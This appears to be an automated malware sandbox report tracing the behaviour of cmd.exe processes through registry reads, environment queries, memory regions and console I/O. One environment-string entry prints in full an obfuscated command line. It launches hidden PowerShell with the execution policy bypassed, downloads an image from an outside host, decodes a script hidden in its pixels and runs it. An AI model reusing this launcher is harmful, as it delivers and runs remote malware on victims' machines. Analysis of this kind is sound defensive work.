Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Environment	Get Environment String	name = [-,, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIzy=EchO (gi vaRIAble:eXt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 1095	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #12: cmd.exe

625

0

»

Information	Value
ID	#12
File Name	c:\windows\system32\cmd.exe
Command Line	cmd ;
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:43, Reason: Child Process
Unmonitor	End Time: 00:02:06, Reason: Self Terminated
Monitor Duration	00:00:23

OS Process Information

»

Information	Value
PID	0xb44
Parent PID	0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B48

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00044fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x00000000001a0000	0x001a0000	0x001affff	Private Memory	rw	-
private_0x0000000000230000	0x00230000	0x0032ffff	Private Memory	rw	-
private_0x0000000000330000	0x00330000	0x0042ffff	Private Memory	rw	-
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	rw	-
pagefile_0x0000000000560000	0x00560000	0x006e7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000006f0000	0x006f0000	0x00870fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000880000	0x00880000	0x01c7ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001c80000	0x01c80000	0x01fc2fff	Pagefile Backed Memory	r	-
private_0x0000000001fd0000	0x01fd0000	0x020cffff	Private Memory	rw	-
basebrd.dll	0x020d0000	0x02197fff	Memory Mapped File	r	-
pagefile_0x00000000021a0000	0x021a0000	0x02592fff	Pagefile Backed Memory	r	-
sortdefault.nls	0x025a0000	0x0286efff	Memory Mapped File	r	-
private_0x0000000002870000	0x02870000	0x02a6ffff	Private Memory	rw	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd6fff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xb48

625

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:16 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 141352	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
System	Get Info	type = Operating System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 36	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 63	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 26	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
